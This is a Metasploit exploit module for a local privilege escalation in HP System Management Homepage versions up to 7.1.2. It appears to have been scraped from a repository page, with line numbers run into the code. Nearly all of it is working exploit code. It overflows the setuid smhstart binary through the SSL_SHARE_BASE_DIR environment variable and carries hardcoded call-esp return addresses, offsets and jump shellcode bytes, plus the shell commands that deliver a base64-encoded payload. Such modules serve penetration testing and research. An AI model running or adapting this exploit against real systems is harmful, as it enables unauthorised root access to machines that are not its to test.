Path: blob/master/modules/exploits/linux/local/hp_smhstart.rb
19718 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = NormalRanking78include Msf::Exploit::EXE9include Msf::Post::File1011include Msf::Exploit::Local::Linux1213def initialize(info = {})14super(15update_info(16info,17{18'Name' => 'HP System Management Homepage Local Privilege Escalation',19'Description' => %q{20Versions of HP System Management Homepage <= 7.1.2 include a setuid root21smhstart which is vulnerable to a local buffer overflow in SSL_SHARE_BASE_DIR22env variable.23},24'License' => MSF_LICENSE,25'Author' => [26'agix' # @agixid # Vulnerability discovery and Metasploit module27],28'Platform' => [ 'linux' ],29'Arch' => [ ARCH_X86 ],30'SessionTypes' => [ 'shell' ],31'Payload' => {32'Space' => 227,33'BadChars' => "\x00\x22"34},35'References' => [36['OSVDB', '91990']37],38'Targets' => [39[40'HP System Management Homepage 7.1.1',41{42'Arch' => ARCH_X86,43'CallEsp' => 0x080c86eb, # call esp44'Offset' => 5845}46],47[48'HP System Management Homepage 7.1.2',49{50'Arch' => ARCH_X86,51'CallEsp' => 0x080c8b9b, # call esp52'Offset' => 5853}54],55],56'DefaultOptions' => {57'PrependSetuid' => true58},59'DefaultTarget' => 0,60'DisclosureDate' => '2013-03-30',61'Notes' => {62'Reliability' => UNKNOWN_RELIABILITY,63'Stability' => UNKNOWN_STABILITY,64'SideEffects' => UNKNOWN_SIDE_EFFECTS65},66}67)68)69register_options([70OptString.new("smhstartDir", [ true, "smhstart directory", "/opt/hp/hpsmh/sbin/" ])71])72end7374def exploit75pl = payload.encoded76padding = rand_text_alpha(target['Offset'])77ret = [target['CallEsp']].pack('V')78exploit = pl79exploit << ret80exploit << "\x81\xc4\x11\xff\xff\xff" # add esp, 0xffffff1181exploit << "\xe9\x0e\xff\xff\xff" # jmp => beginning of pl82exploit << padding83exploit_encoded = Rex::Text.encode_base64(exploit) # to not break the shell base64 is better84id = cmd_exec("id -un")85if id != "hpsmh"86fail_with(Failure::NoAccess, "You are #{id}, you must be hpsmh to exploit this")87end88cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit_encoded}' | base64 -d)")89cmd_exec("#{datastore['smhstartDir']}/smhstart")90end91end929394